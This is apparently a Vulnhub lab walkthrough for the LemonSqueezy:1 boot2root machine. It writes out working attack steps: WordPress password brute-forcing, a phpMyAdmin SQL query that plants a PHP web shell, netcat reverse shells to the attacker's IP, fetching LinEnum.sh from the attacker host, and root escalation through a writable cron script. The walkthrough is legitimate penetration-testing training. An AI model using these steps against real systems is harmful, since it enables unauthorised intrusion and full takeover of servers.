LemonSqueezy:1 Vulnhub Walkthrough
Today we are going to solve another boot2root challenge called “LemonSqueezy:1”. It is available on Vulnhub for the purpose of Penetration Testing practices. This lab is not that difficult if we have the proper basic knowledge of cracking the labs. This credit of making this lab goes to James Hay. Let’s start and learn how to successfully breach it.
Level: Easy to Intermediate
Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this here
Penetration Testing Methodology
- Abusing HTTP Services
- Web Directory Bruteforce (dirb)
- Wpscan for Username and Password Enumeration
- Logging to WordPress
- Shell Uploading through PhpMyAdmin
- Using LinEnum.sh
- Creating Netcat Shell using msfvenom
- Abusing cronjob for Writable Script
- Capture the flag
As you know, this is the initial phase where we choose netdiscover for network scan for identifying host IP and this we have 192.168.1.105 as our host IP.
Then we used nmap for port enumeration. We found port 80 for http.
nmap -A 192.168.1.105
For more detail, we will be needing to start enumeration against the host machine. Since port 80 is open I look toward browser and explore target ip 192.168.1.105 . But it is not much of great help. Moving on.
Further, we use dirb for directory brute-forcing and found phpmyadmin & wordpress page with status code 200 OK on executing following command.
When we searched the above-listed page, i.e. wordpress we found nothing useful.
So, the first idea that came to us was to run a wpscan on the webpage and see what the scan enumerates.
wpscan --url http://192.168.1.105/wordpress -e u
I found two user names: orange and lemon.
Now the next job is to hunt for a password for user orange for which we will use rockyou.txt. Time to fire up wpscan with our username & password list to valid user login combination.
wpscan --url http://192.168.1.105/wordpress -U orange -P /usr/share/wordlist/rockyou.txt
We have successfully found the password for orange. Let’s make good use of them.
Now we mapped the domain name with the target machine’s IP address in the /etc/hosts file.
Further, we login to WordPress using orange credentials. It was holding another clue for us in edit post section we found a password i.e. nOt1n@wOrdl1st! .
Now our next job is to try to login phpmyadmin page with this password using user orange.
After logging in let’s explore the page further to find some juicy information.
Here we found the database named wordpress.
So, we have login into phpmyadmin, now it was time to exploit phpMyAdmin to get a reverse connection and we have already published a post on “Shell Uploading in Web Server through PhpMyAdmin”. With the help of this post, I try to exploit phpMyAdmin and follow the given steps.
Within the database of WordPress, we created a table as I have given raj and click on create.
Click on raj to construct an MYSQL query inside your database. Hence click on SQL tab where you can enter the SQL query code.
Now, the next part is interesting because here I am going to execute malicious code as SQL query which will create a Remote code Execution inside the webserver. In the following screenshot, you can see I have given above malicious php code as SQL query and then click on GO tab to execute it.
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/wordpress/backdoor.php"
Now type the following URL to find whether we are successful or not in order to create RCE vulnerability.
When you execute the above URL in the browser you will get the information of victim ‘s PC.
Now it was time to get netcat reverse connection of the host machine by executing the following URL.
http://192.168.1.105/wordpress/backdoor.php?cmd=nc -e /bin/bash 192.168.1.112 1234
Now before executing the backdoor let’s fire up netcat listener in another terminal.
nc -lvp 1234
Oh Yeah!! We got the reverse shell, but it is not a proper shell. We will spawn a tty shell using python.
python -c 'import pty;pty.spawn("/bin/bash") ls
here we found a text file name user.txt as 1st flag. Now let go for Privilege Escalation with the help of Linenum.sh which will help us in post enumeration.
Next, we tried to download linenum.sh in /tmp but we were not able to do so because /tmp was not having the permission to do so. Since /var/www/html/wordpress is writable we will try to download there.
LinEnum.sh is bash script used for enumerating the Linux machine to checks which services are running on the machine, privileges access, version information, system information, user information etc.
- Download the script or get the location where this script is stored.
- Host the python server and copy the link of the LinEnum.sh file.
- Download the script in the remote host using “wget” command in the “/var/www/html/wordpress” directory.
- Change the permission of the LinEnum.sh shell script using “chmod” command.
- Now run the script in the remote machine.
cd /var/www/html/wordpress wget http://192.168.1.112:8000/LinEnum.sh chmod 777 LinEnum.sh ./LinEnum.sh
So here got some information after running the shell script LinEnum.sh
As a result, we found that /etc/logrotate.d/logrotate is writable and also run as cronjob at every 2 minutes after.
cat /etc/crontab cd /etc/logrotate.d ls -la
In order to compromise the machine and get the root access, we will use msfvenom for our further exploitation.
msfvenom -p /cmd/unix/reverse_netcat lhost=192.168.1.112 lport=4444 R
As we know logrotate is writable and run as a cronjob, therefore, I will overwrite this file with the following command.
echo "code here" > logrotate
On other hand we will fire up netcat listener in another terminal to get a reverse shell and wait for some 2 minutes as soon as the logrotate will execute as cronjob this will give us root privileges shell and finally capture the final flag.
nc -lvp 4444 id cd /root ls cat root.txt
Author: Japneet Kaur Gandhi is a Technical Writer, Researcher and Penetration Tester. Contact here